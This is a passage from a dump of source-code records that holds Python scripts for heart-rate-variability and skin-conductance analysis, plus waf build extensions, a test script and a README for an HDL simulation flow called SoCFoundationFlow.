half_loc = peak_loc\n half_amplitude = SCR_Param['Amplitude'][i] * 0.5\n found = 0\n while half_loc < half_loc + HalfRecovery_window and found == 0 and half_loc < len(df_EDA):\n if half_amplitude <= df_EDA['filtered_eda'][peak_loc] -df_EDA['filtered_eda'][half_loc]:\n # SCR_Param['HalfRecoveryTime'][i] = (half_loc - peak_loc) / f\n half_times = np.append(half_times, (half_loc - peak_loc) / f)\n found = 1\n\n half_loc += 1\n if found == 0:\n # SCR_Param['HalfRecoveryTime'][i] = HalfRecovery_window\n half_times = np.append(half_times, 0)\n\n SCR_Param['HalfRecoveryTime'] = half_times\n\n SCR_Param.rename(columns={'Peak': 'PeakTime', 'Bottom': 'BottomTime', 'PeakStart': 'PeakStartTime'}, inplace=True)\n\n SCR_Param['PeakTime'] = SCR_Param['PeakTime'] / f\n SCR_Param['BottomTime'] = SCR_Param['BottomTime'] / f\n SCR_Param['PeakStartTime'] = SCR_Param['PeakStartTime'] / f\n\n return df_EDA, SCR_Param\n"
},
{
"alpha_fraction": 0.45882704854011536,
"alphanum_fraction": 0.4897255003452301,
"avg_line_length": 26.895397186279297,
"blob_id": "b53e2d5d044d16c30d8b0dae482baeb71b28b25b",
"content_id": "b7447047c83be4ba36a036de017980a486046110",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6906,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 239,
"path": "/code/hrv.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport math\nimport statsmodels.api as sm\nimport numpy.linalg as LA\nfrom statsmodels.tsa import ar_model\nimport scipy as sp\nimport datetime as dt\nimport scipy.stats as stats\nfrom scipy import integrate\n\n\n###SG検定による異常値除去\ndef smirnov_grubbs(data, t, alpha):\n x, o = list(data), []\n while True:\n n = len(x)\n t1 = stats.t.isf(q=(alpha / n) / 2, df=n - 2)\n tau = (n - 1) * t1 / np.sqrt(n * (n - 2) + n * t1 * t1)\n i_min, i_max = np.argmin(x), np.argmax(x)\n myu, std = np.mean(x), np.std(x, ddof=1)\n i_far = i_max if np.abs(x[i_max] - myu) > np.abs(x[i_min] - myu) else i_min\n tau_far = np.abs((x[i_far] - myu) / std)\n if tau_far < tau: break\n o.append(i_far)\n x.pop(i_far)\n for i in o:\n t = np.delete(t, i)\n return np.array(x), np.array(t)\n\n\ndef outlier_rm(data, t):\n #心拍変動データの三次スプライン補完\n t = np.array(t)\n\n dataf = sp.interpolate.interp1d(t,data,kind=\"cubic\")\n t = np.array(range(int(t.max())))\n\n data = dataf(t)\n #異常値除去+欠損値補間\n data, t= smirnov_grubbs(data, t, 0.05)\n dataf = sp.interpolate.interp1d(t, data, kind=\"linear\")\n data = dataf(t)\n\n return data, t\n\ndef RRI_data(df_rri, date):\n df_rri['time'] = date + df_rri['time']\n rri = df_rri.values[:, 1]\n t_datetime_rri = [dt.datetime.strptime(df_rri['time'][i], '%Y/%m/%d %H:%M:%S') for i in range(df_rri.shape[0])]\n t_unix_rri = [0] * df_rri.shape[0]\n t_unix_rri[0] = t_datetime_rri[0].timestamp()\n for i in range(1, df_rri.shape[0]):\n t_unix_rri[i] = t_unix_rri[i-1]+rri[i]*0.001\n return rri, t_unix_rri\n\n###PSDの計算\ndef psd_cal(data):\n model = ar_model.AR(data)\n results = model.fit(maxlag=12)\n k = 12\n N = 512\n Y = results.predict()\n A = results.params #係数ai\n res = results.resid #分散σ^2\n s = res.std(ddof=0)\n s2 = s**2\n\n\n # Frequency = np.fft.fftfreq(N, d=dt)\n freq = np.arange(0, 0.5, 0.5/N)\n P= []\n\n\n # for f in Frequency[:int(N/2)]:\n for f in freq:\n S = 0\n for i in range(1, results.k_ar + 1):\n S += results.params[i] * (math.e)**(-2 * math.pi * 1j * i * f)\n psd = s2 / (abs(1 - S))**2\n P = np.append(P, psd)\n return P, freq\n\n\n\n###LP面積の計算\ndef LP_cal(data):\n N = data.shape[0]\n #データ可視化\n RRIn = np.array(data[:N-1])\n RRIn1 = np.array(data[1:])\n a = np.column_stack((RRIn, RRIn1))\n N = a.shape[0]\n\n ###LP面積算出\n #y=xへの投影\n pro_yx = np.zeros((N, 2))\n b = np.array([1,1])\n for i in range(N):\n pro_yx[i, :] = np.dot(a[i,:], b)/np.dot(b, b) *b\n #y=-xへの投影\n pro_y_x = np.zeros((N, 2))\n b = np.array([1,-1])\n for i in range(N):\n pro_y_x[i,:] = np.dot(a[i,:], b)/np.dot(b, b) * b\n #ノルムの計算\n d_yx = np.zeros(N)\n d_y_x = np.zeros(N)\n for i in range(N):\n d_yx[i] = LA.norm(pro_yx[i, :], ord=2)\n d_y_x[i] = LA.norm(pro_y_x[i, :], ord=2)\n #標準偏差の算出\n s_yx = np.std(d_yx)\n s_y_x = np.std(d_y_x)\n S = math.pi * s_yx * s_y_x\n d = np.mean(d_yx)\n return S, s_yx/s_y_x, np.log10(s_yx*s_y_x)\n\n###LF,HFの計算\ndef linerequation(x1, y1, x2, y2):\n a = (y2 - y1) / (x2 - x1)\n b = y1 - a * x1\n return a, b\n\ndef Integrate(x1, y1, x2, y2):\n a = (y2 - y1) / (x2 - x1)\n b = y1 - a * x1\n\n y = lambda x: a*x + b\n S, err = integrate.quad(y, x1, x2)\n return S\n\ndef calc_LF_HF(Pow, freq):\n # LF, HFの閾値の設定\n VLF_lower, VLF_upper = 0, 0.05\n LF_lower, LF_upper = 0.05, 0.15\n HF_lower, HF_upper = 0.15, 0.40\n VLF = 0\n # for i in range(int(N/2) + 1):\n for i in range(len(freq)):\n if VLF_lower <= freq[i] < VLF_upper:\n if freq[i-1] <= VLF_lower:\n a1, b1 = linerequation(freq[i-1], Pow[i-1], freq[i], Pow[i])\n y1 = lambda x: a1 * x + b1\n VLF, err = integrate.quad(y1, VLF_lower, freq[i])\n\n vlf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n VLF += vlf\n\n elif VLF_upper <= freq[i+1]:\n a1, b1 = linerequation(freq[i], Pow[i], freq[i+1], Pow[i+1])\n y1 = lambda x: a1 * x + b1\n vlf, err = integrate.quad(y1, freq[i], VLF_upper)\n VLF += vlf\n\n else:\n vlf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n VLF += vlf\n\n elif LF_lower < freq[i] < LF_upper:\n if freq[i-1] <= LF_lower:\n a1, b1 = linerequation(freq[i-1], Pow[i-1], freq[i], Pow[i])\n y1 = lambda x: a1 * x + b1\n LF, err = integrate.quad(y1, LF_lower, freq[i])\n\n lf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n LF += lf\n\n elif LF_upper <= freq[i+1]:\n a1, b1 = linerequation(freq[i], Pow[i], freq[i+1], Pow[i+1])\n y1 = lambda x: a1 * x + b1\n lf, err = integrate.quad(y1, freq[i], LF_upper)\n LF += lf\n\n else:\n lf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n LF += lf\n\n elif 0.15 <= freq[i] < 0.40:\n if freq[i-1] <= HF_lower:\n a1, b1 = linerequation(freq[i-1], Pow[i-1], freq[i], Pow[i])\n y1 = lambda x: a1 * x + b1\n HF, err = integrate.quad(y1, HF_lower, freq[i])\n\n hf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n HF += hf\n\n elif HF_upper <= freq[i+1]:\n a1, b1 = linerequation(freq[i], Pow[i], freq[i+1], Pow[i+1])\n y1 = lambda x: a1 * x + b1\n hf, err = integrate.quad(y1, freq[i], HF_upper)\n HF += hf\n\n else:\n hf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n HF += hf\n\n return VLF, LF, HF\n\ndef HR_cal(RRI):\n RRI = np.array(RRI)\n HR = np.empty_like(RRI)\n for i, rri in enumerate(RRI):\n HR[i] = 60000/rri\n return HR\n\ndef params_cal(RRI):\n RRI = np.array(RRI)\n N = RRI.shape[0]\n\n ##時系列指標\n mean = np.mean(RRI) #平均値\n SDNN = np.std(RRI) #標準偏差\n #pNN50の計算\n pNNcnt = 0\n diff = [0]*(N-1)\n for i in range(N-1):\n diff[i] = RRI[i+1]-RRI[i]\n if abs(diff[i]) > 50:\n pNNcnt+=1\n pNN50 = pNNcnt/(N-1)\n #RMSSDの計算\n RMSSD = 0\n for i in range(N-1):\n RMSSD += diff[i]**2\n RMSSD = math.sqrt(RMSSD/(N-1))\n\n ##PSD関連パラメータ\n P, freq = psd_cal(RRI)\n VLF, LF, HF = calc_LF_HF(P, freq)\n TotalPow = VLF + LF + HF\n\n ###幾何学指標\n S, CSI = LP_cal(RRI)\n\n params = [mean, SDNN, pNN50, RMSSD, VLF, LF, HF, LF/HF, TotalPow, S]\n\n return params\n"
},
{
"alpha_fraction": 0.5344827771186829,
"alphanum_fraction": 0.563894510269165,
"avg_line_length": 28.878787994384766,
"blob_id": "4a09c6633d77e957ec5e78f15b03d2d3a6931dc0",
"content_id": "ecd2f757e6d8f0c1317be5fe4cb2af48a0d3dd5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1016,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 33,
"path": "/code/E4.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\ndef time_sync(data, t_unix, t_start, t_end):\n ts = 0\n #データのスタート時刻を合わせる\n for i, ti in enumerate(t_unix):\n if ts==0 and int(ti)>=int(t_start):\n ts = i\n if int(ti)>=t_end:\n eda_data = data[ts:i]\n t_data = t_unix[ts:i]\n break\n print(ts, i)\n t_data = [(t_data[i]-t_data[0]) for i in range(len(t_data))]\n return eda_data, t_data\n\ndef ibi_data(df_ibi):\n t_ibi = df_ibi.values[:, 0]\n ibi = df_ibi.values[:, 1]\n t_unix_ibi = [(t_ibi[i]+float(df_ibi.columns[0])) for i in range(t_ibi.shape[0])]\n ibi = ibi*1000\n return ibi, t_unix_ibi\n\ndef bvp_data(df_bvp):\n bvp = df_bvp.values[1:, 0]\n t_unix_bvp = [(0.015625*i+float(df_bvp.columns[0])) for i in range(bvp.shape[0])]\n return bvp, t_unix_bvp\n\ndef eda_data(df_eda):\n eda = df_eda.values[1:, 0]\n t_unix_eda = [(0.25*i+float(df_eda.columns[0])) for i in range(eda.shape[0])]\n return eda, t_unix_eda\n"
},
{
"alpha_fraction": 0.5975308418273926,
"alphanum_fraction": 0.6271604895591736,
"avg_line_length": 19.25,
"blob_id": "aee0bc880feadb6f95b625f0dc355ec4f5f39222",
"content_id": "f6a827ec8773a7d3cdd8f64750024645ade4c063",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 405,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 20,
"path": "/code/anova.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
"text": "import pyper\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nscore_name = 'SCR'\n\ndf = pd.read_excel('../log/total/CA.xlsx')\n#df = df[['A', 'B', score_name]]\ndf = df[['a1', 'a1.1', 'a2', 'a2.1']]\n\nprint(df)\n\nr = pyper.R(use_pandas='True')\n\nr.assign('data', df)\n\nr(\"source('anovakun_485.txt', encoding='utf-8')\")\nresult = r('anovakun(data,\"sAB\", 2, 2, eta=T, holm=T)')\nprint(result)\n"
}
] | 4 |
JohnSkubic/SoCFoundationFlow | https://github.com/JohnSkubic/SoCFoundationFlow | 79e860ea5383b48cf99d3450353f19975c7616e4 | 157179b140c20c4c6992ee6056192829f120c352 | eb58d01b1da69f922397c07f8ba68abf188b7607 | refs/heads/master | 2021-01-20T03:14:28.387822 | 2017-06-01T20:51:13 | 2017-06-01T20:51:13 | 89,514,600 | 0 | 0 | null | 2017-04-26T18:38:05 | 2016-12-02T06:40:03 | 2016-12-02T06:55:58 | null | [
{
"alpha_fraction": 0.5594956874847412,
"alphanum_fraction": 0.5621224045753479,
"avg_line_length": 27.200000762939453,
"blob_id": "c2e9bafaec3579a3a8fc88ea3b953f49bcd1dbef",
"content_id": "5b38b523c90ef44181c1525558476d1fd168f558",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3807,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 135,
"path": "/admin/waf/waf-extensions/SFFmodelsim.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# John Skubic, 2017\n\n\"\"\"\nClasses and helper functions used to provide\n\"sim_source\"\n\"verify_source\"\nvia the Mentor Graphics Modelsim suite\n\"\"\"\n\nfrom waflib import Context\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import TaskGen\nfrom waflib import Task\nfrom waflib import Utils\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method\nimport pickle\nimport os,sys\nfrom SFFbuildmgr import SFF_verilog_scan\nfrom SFFbuildmgr import SFFUnitsCont, SFFUnit, SFFView, load_SFFUnits\n\ndef configure(ctx):\n \"\"\"\n Modelsim: Find all the necessary parts of the Modelsim Simulator.\n \"\"\"\n ctx.find_program('vlog')\n ctx.find_program('vcom')\n ctx.find_program('vlib')\n ctx.find_program('vsim')\n\ndef _simulate(ctx, gui):\n \"\"\"\n Load the SFFUnits into the system.\n Create the necessary tasks to build the simulation libs\n Kick vsim targetting the testbench\n \"\"\"\n ctx.env['SFFUnits'] = load_SFFUnits(ctx)\n\n \"\"\"\n Creates the directory path and nodes in the build directory.\n Creates a taskgen from each other library in units_hdl\n \"\"\"\n\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n\n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node('work_vlib')\n lib.mkdir()\n u.b['vlib'] = lib\n\n if u.use('use'):\n tsk = ModelsimTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n includes=u.use('includes'),\n after=u.use('use'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n else:\n tsk = ModelsimTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n output=lib,\n includes=u.use('includes'),\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n\n\n \"\"\"\n Create the testbench taskgen last as it is always at the top dep\n \"\"\"\n ctx.add_group()\n tb_lib = top.script.parent.get_bld().make_node('work_vlib')\n tb_lib.mkdir()\n top.b['tbvlib'] = tb_lib\n\n tsk = ModelsimTask(\n name=top.use('tb'),\n target=tb_lib,\n source=top.use('tb_src'),\n output=tb_lib,\n includes=top.use('tb_includes'),\n after=ctx.env.top_level,\n scan=SFF_verilog_scan,\n env=ctx.env )\n ctx.add_to_group(tsk)\n ctx.add_group()\n\n \"\"\"\n Run the Modelsim command with gui options provided.\n \"\"\"\n ##Run vsim\n ctx(name='vsim',\n rule='vsim %s -lib %s %s' % (gui,top.b['tbvlib'], top.use('tb')[0]),\n always = True)\n\nclass ModelsimTask(Task.Task):\n def __init__(self, *k, **kw):\n Task.Task.__init__(self, *k, **kw)\n\n self.set_inputs(list(kw['source']))\n self.set_outputs(kw['output'])\n self.includes = kw['includes']\n self.before = ['ncelab','ncsim']\n from types import MethodType\n self.scan = MethodType(kw['scan'],self)\n\n\n def __str__(self):\n return '%s: %s\\n' % (self.__class__.__name__,self.outputs[0])\n\n def run(self):\n src = ''\n for s in self.inputs:\n src += s.bldpath() + ' '\n tgt = self.outputs[0].bldpath()\n incs = ''\n if hasattr(self.generator,'includes'):\n incs = ''\n for inc in getattr(self.generator,'includes'):\n incs += '+incdir+' + inc.bldpath() + ' '\n res = ''\n cmd_setup = 'vlib %s; ' % (self.outputs[0])\n cmd = '%s vlog -sv -work %s %s %s' % (cmd_setup, self.outputs[0],\n incs, src)\n return self.exec_command(cmd)\n"
},
{
"alpha_fraction": 0.5854383111000061,
"alphanum_fraction": 0.5943536162376404,
"avg_line_length": 31,
"blob_id": "d76de4a5c033baba1477c234cb63b268a5fb01d0",
"content_id": "e754f469b6498167bdc43eeef9784e789bdb6e58",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 673,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 21,
"path": "/waf_test/run_tests.bash",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ntests=(defaults defaults_n_user basic_dependencies include_only src_only tb_include_only tb_only two_src find_src basic_views)\n\n#Testing the check option\nfor ((i = 0; i < ${#tests[@]}; i++)); do\n printf \"\\nRunning: ${tests[$i]} \\n\"\n printf \"waf configure --top_level=${tests[$i]} --check\\n\\n\"\n eval \"waf configure --top_level=${tests[$i]} --check\"\n if [ $? -ne 0 ]; then exit 1; fi\n\ndone\n\n#Testing without the check\nfor ((i = 0; i < ${#tests[@]}; i++)); do\n printf \"\\nRunning: ${tests[$i]} \\n\"\n printf \"waf configure --top_level=${tests[$i]}\\n\"\n eval \"waf configure --top_level=${tests[$i]}\"\n if [ $? -ne 0 ]; then exit 1; fi\n\ndone\n\n"
},
{
"alpha_fraction": 0.7571815848350525,
"alphanum_fraction": 0.7571815848350525,
"avg_line_length": 20.952381134033203,
"blob_id": "72ea68101bf66e9db5264d402fbdf37698c4adf1",
"content_id": "cb9c93466bb21a3ed540157c7d05c9d43a31bf9c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1845,
"license_type": "permissive",
"max_line_length": 197,
"num_lines": 84,
"path": "/README.md",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "# SoCFoundationFlow (SFF)\n\n## Setting up SFF\n\nBash:\n\nAdd the following lines to your ~/.bashrc file.\n~~~~\nexport SFF_ADMIN=<absolute path to admin directory of SFF>\nsource $SFF_ADMIN/setup_env.bash\nexport SFF_SIM_ENV=<Simulation Environment>\n~~~~\n\nTcsh:\n\nAdd the following lines to your ~/.cshrc file.\n~~~~\nsetenv SFF_ADMIN <absolute path to admin directory of SFF>\nsource $SFF_ADMIN/setup_env.tcsh\nsetenv SFF_SIM_ENV <Simulation Environment>\n~~~~\n\n## Running WAF\n\nAll files created by WAF will end up in the build directory.\n\nClearing the build directory:\n~~~\nwaf distclean\n~~~\n\nSetting up your project:\n~~~\nwaf configure --top_level=<top_level>\n~~~\n\nRunning a simulation without the gui:\n~~~\nwaf verify_source\n~~~\n\nRunning a simulation with the gui:\n~~~\nwaf sim_source\n~~~\n\nOutputting source and include file lists:\n~~~\nwaf dump_source\n~~~\nThe file dumps will be in a subdirectory of build. The name of this directory will be the name of the directory will be:\n\nbuild/<dir_of_wscript>/work_dump/\n\n## Currently Supported Simulation Environments\n\nThe simulation environment dictates what tools will be used when simulating designs. The following list are values that can be set in the SFF_SIM_ENV variable to choose the respective environment.\n\n- incisive\n- modelsim\n\nThe following environments will be supported in future updates.\n\n- iverilog\n\n\n## Dependencies\n\nThe following tools must be installed for all simulation environments.\n\n- [Veripool Verilog-Perl](https://www.veripool.org/wiki/verilog-perl)\n - Requires the command \"vppreproc\" to be on your path\n\n### Incisive\n\nThe following tools must be installed for the incisive simulation environment.\n\n### Modelsim\n\nThe following tools must be installed for the modelsim simulation environment.\n\n### Iverilog\n\nThe following tools must be installed for the iverilog simuation environment.\n\n"
},
{
"alpha_fraction": 0.5250757932662964,
"alphanum_fraction": 0.5283881425857544,
"avg_line_length": 33.29280090332031,
"blob_id": "65b2a49e9a3b5b0ba14a562041bd10e70742f788",
"content_id": "8a8222eeaafc5984e8066fccd66a75e6aae2366a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21435,
"license_type": "permissive",
"max_line_length": 157,
"num_lines": 625,
"path": "/admin/waf/waf-extensions/SFFbuildmgr.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# Matthew Swabey, 2015\n# Matthew Swabey, 2016\n\n\"\"\"\nClasses and helper functions used to build the Foundation Flow.\nAnything that is used by more than one tool lives here.\n\nTODO:\n3) Make it work with Incisive.\n4) Consider using a +view notation to add a view to existing views.\n\"\"\"\n\nfrom waflib.Configure import conf\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Utils\nfrom waflib import Errors\nfrom waflib import Context\nfrom waflib import Options\nfrom waflib import Node\nimport pickle\nimport os.path\nimport sys\nimport SFFutil\nimport SFFerrors\n\n\ndef options(ctx):\n ctx.add_option('--top_level', action='store',\n help=('Set the root unit of the design'))\n\n ctx.add_option('--views', action='store', default='default',\n help=('Set an ordered, comma-separated, list of views to '\n 'supply to the command.'))\n\n ctx.add_option('--check', action='store_true', default=False,\n help=('Check all units for correctness.'))\n\ndef configure(ctx):\n if not ctx.options.top_level:\n raise Errors.ConfigurationError(\n 'SoCManager: Please set a top level unit by running waf '\n 'configure --top_level=<top_level>')\n ctx.env['top_level'] = ctx.options.top_level\n ctx.env['views'] = ctx.options.views\n ctx.env['check'] = ctx.options.check\n\n \"\"\"Create class in the context to hold/manipulate the SFFUnits.\"\"\"\n ctx.SFFUnits = ctx.SFFUnitsCont()\n\n \"\"\"File extensions to compile as Verilog.\"\"\"\n ctx.env.VLOG_EXT = ['.v']\n \"\"\"File extensions to compile as VHDL.\"\"\"\n ctx.env.VHDL_EXT = ['.vhdl', '.vhd']\n \"\"\"File extensions to compile as System Verilog.\"\"\"\n ctx.env.SVLOG_EXT = ['.sv']\n \"\"\"File extensions to identify Synopsys Design Constraints (SDC) files.\"\"\"\n ctx.env.SDC_EXT = ['.sdc']\n\n \"\"\"\n Static version of Perl vppreproc http://www.veripool.org/ used to parse\n verilog for headers.\n \"\"\"\n ctx.find_program('vppreproc')\n\n@conf\nclass SFFUnitsCont():\n \"\"\"\n Class to store and manipulate SFFUnit objects.\n \"\"\"\n def __init__(self, ctx):\n \"\"\"\n Create an empty dictionary to store the units.\n Store the ctx where we were created for later.\n \"\"\"\n self.check = ctx.env['check']\n self.ctx = ctx\n self.units = {}\n self.top_level = ctx.env['top_level']\n self._packed = False\n self.views = SFFutil.strtolist(ctx.env['views'])\n self.synu_deps = []\n self.simu_deps = []\n\n def getunit(self, unit):\n if isinstance(unit, list):\n return [self.units.get(u) for u in unit]\n else:\n return self.units[unit]\n\n def add(self, *args, **kwargs):\n \"\"\"\n Creates a SFFUnit and inserts it into the unit dictionary if there\n isn't already an existing one.\n \"\"\"\n unit = self.ctx.SFFUnit(*args, **kwargs)\n\n if unit.name in self.units:\n raise Errors.ConfigurationError(\n (\"SoCManager: Error. Module names must be unique. Module '{0}'\"\n \" from script '{1}' already defined by script '{2}'\").format(\n unit.name, self.ctx.cur_script.srcpath(),\n self.getunit(unit.name).script.srcpath()))\n self.units[unit.name] = unit\n\n def addview(self, name, view, **kwargs):\n if name not in self.units:\n raise Errors.ConfigurationError(\n (\"SoCManager: Error. Cannot find Module '{0}'\"\n \" from script '{1}' to add view '{2}'\").format(\n name, self.ctx.cur_script.srcpath(), view))\n else:\n self.units[name].addview(view, **kwargs)\n\n def _buildunitdeps(self, unit_order, unit):\n \"\"\"\n Order a list which can be built from left to right to build all\n units from a dictionary of named units which have\n a subkey 'use' referring to other named prerequisite units.\n If memory becomes a problem then change to iterative from recursion.\n \"\"\"\n if unit in unit_order:\n return unit_order\n elif 'use' in self.units[unit]._k.keys():\n for u in self.units[unit]._k.use('use'):\n try:\n unit_order = self._buildunitdeps(unit_order, u)\n except KeyError:\n raise Errors.ConfigurationError(('Unit \\'{0}\\''\n ' required by \\'{1}\\' defined in \\'{2}\\' has not been'\n ' defined.').format(u, unit,\n self.units[unit].script.srcpath()) )\n\n unit_order.append(unit)\n return unit_order\n\n def get_unit_deps(self, name):\n \"\"\"\n Starting at unit 'name' generate two lists of deps in leaf first order\n \"\"\"\n synu_deps = self._buildunitdeps([], name)\n\n simu_deps = []\n if 'tb_use' in self.units[name]._k.keys():\n for tb_dep in self.units[name]._k.use('tb_use'):\n simu_deps = self._buildunitdeps(simu_deps, tb_dep)\n simu_deps = [u for u in simu_deps if u not in synu_deps]\n\n return synu_deps, simu_deps\n\n def finalize(self):\n \"\"\"\n If --check is not defined:\n 1) Process the unit views' inheritance on the use and use_tb keys\n 2) Search the unit tree from the top and build the dependency order\n from --top_level unit for syn and sim using use and use_tb\n 3) Drop unused units from self.units to save memory and processing\n 4) Process the unit views' inheritance on remaining keys\n 5) Pickle internal state where necessary and store to env['SFFUnits']\n\n if --check is defined:\n 1) Check every view of every unit\n 2) Go back to 1) above\n TODO 1.5) Walk all deps\n\n \"\"\"\n\n # Test the existence of the top_level unit key\n try:\n self.getunit(self.top_level)\n except KeyError:\n raise Errors.ConfigurationError(('Top Level \"{0}\" not'\n ' found. Please re-run \"waf configure --top_level= \" with the'\n ' correct top_level name or check the unit names and recurses'\n ' in your wscript files.').format(self.top_level))\n\n if self.check:\n self.ctx.msg('Option', '--check', color='BLUE')\n for m in self.units:\n self.units[m].check_all()\n\n # Apply inheritance on the use and tb_use directives\n for name,unit in self.units.items():\n self.units[name].applyinheritance(self.views, ('use','tb_use'))\n\n # Get the top_level unit dependencies from the use and tb_use keys\n synu,simu = self.get_unit_deps(self.top_level)\n self.synu_deps = synu\n self.simu_deps = simu\n\n # Prune the SFFUnits dictionary to only syn and sim units\n self.units = dict((k, self.units[k])\n for k in simu + synu)\n\n # Apply inheritance on all keys\n for name,unit in self.units.items():\n self.units[name].applyinheritance(self.views)\n\n # Get and store the unit dependencies from the use and tb_use keys\n for name,unit in self.units.items():\n synu,simu = self.get_unit_deps(name)\n self.units[name].set_deps(self.getunit(synu), self.getunit(simu))\n\n self.ctx.msg('top_level set to', '{0}'.format(self.top_level),\n color='BLUE')\n self.ctx.msg('Units for simulation', '{0}'.format(self.simu_deps),\n color='BLUE')\n self.ctx.msg('Units for synthesis', '{0}'.format(self.synu_deps),\n color='BLUE')\n\n # Context contains one or more waflib.Nodes.Nod3 which cannot be\n # pickled so we have to get rid of it. Also the configuration\n # context is not valid in build etc.\n for m in self.units:\n self.units[m].pack()\n env = self.ctx.env\n delattr(self,'ctx')\n env['SFFUnits'] = pickle.dumps(self)\n self._packed = True\n\n def unpack(self, ctx):\n self.ctx = ctx\n for name,unit in self.units.items():\n unit.unpack(ctx)\n self._packed = False\n\ndef load_SFFUnits(ctx):\n new_SFFUnits = pickle.loads(ctx.env['SFFUnits'])\n new_SFFUnits.ctx = ctx\n for name,unit in new_SFFUnits.units.iteritems():\n unit.unpack(ctx)\n return new_SFFUnits\n\n\n@conf\nclass SFFUnit:\n def __init__(self, ctx, *args, **kwargs):\n \"\"\"\n Create a SFFUnit object.\n \"\"\"\n cur_view = 'default'\n\n try:\n if len(args) == 2:\n if isinstance(args[0], str) and isinstance(args[1], str):\n self.name = args[0]\n cur_view = 'args[1]'\n if len(args) == 1:\n if isinstance(args[0], str):\n self.name = args[0]\n elif len(args) == 0:\n self.name = str(ctx.path)\n else:\n raise\n except:\n raise ctx.errors.ConfigurationError(\n 'Malformed SFFUnit() in: {0}.\\n{1}'.format(\n ctx.cur_script.srcpath(), ctx.cur_script.read()))\n\n self.ctx = ctx\n self._packed = False\n self._check = False\n self.simu_deps = []\n self.synu_deps = []\n\n #Script that created us\n self.script = ctx.cur_script\n #Dictionary for the different views\n self._v = {}\n #Post inheritance view\n self._k = SFFView(self)\n #Dictionary for build keys that are attached by other tools\n self.b = {}\n\n self.addview(cur_view, **kwargs)\n\n def __repr__(self):\n string = \"SFFUnit {0}\\n\".format(self.name)\n string.join('{}{}'.format(key, val) for key, val in self.__dict__.items())\n return string\n\n def addview(self, view, **kwargs):\n if view in self._v:\n raise Errors.ConfigurationError(\n (\"SoCManager: Error. View names must be unique. Module '{0}'\"\n \" from script '{1}' already has view '{2}'\").format(\n self.name, self.script.srcpath(), view))\n\n #Create & store the kwargs into the view\n self._v[view] = SFFView(self, **kwargs)\n\n def applyinheritance(self, views, keys = None):\n \"\"\"\n 1) Go through the --views in the order specified in the list views.\n 2) Test the first char to see if it is '+'\n 3) If keys is a list process only them. If keys = False process all\n keys.\n Note if a view doesn't have a '+' we are simply overwriting data from other views. If it is a '+view' we append to existing keys and create\n new ones. We apply str -> list conversion here \"on demand\"\n \"\"\"\n\n for view in views:\n addview = False\n if view[0] is '+':\n view = view[1:]\n addview = True\n\n if view in self._v:\n if keys:\n keys_ck = keys\n else:\n keys_ck = self._v[view].keys()\n for k in keys_ck:\n if addview is False:\n if k in self._v[view].keys():\n newkey = SFFutil.strtolist(self._v[view].get(k))\n self._k.add(k, newkey)\n else:\n if k not in self._k.keys() and k in self._v[view].keys():\n newkey = SFFutil.strtolist(self._v[view].get(k))\n self._k.add(k, newkey)\n elif k in self._k.keys() and k in self._v[view].keys():\n newkey = SFFutil.strtolist(self._v[view].get(k))\n oldkey = self._k.get(k)\n self._k.add(k, oldkey + newkey)\n\n def check_all(self):\n \"\"\"\n Check all views\n \"\"\"\n if self._check:\n raise Errors.ConfigurationError(\n \"'{0}': Error. Module has already been checked.\".format(\n self.name))\n else:\n self._check = True\n\n try:\n for v in self._v:\n self._v[v].check()\n except SFFerrors.Error as e:\n raise Errors.ConfigurationError(\n (\"Module '{0}': Error. View '{1}' failed check with \"\n \"message: {2}\".format(self.name, v, e.msg)))\n\n def pack(self):\n env = self.ctx.env\n self.script = self.script.srcpath()\n delattr(self,'ctx')\n self._k.pack()\n for view in self._v:\n self._v[view].pack()\n self._packed = 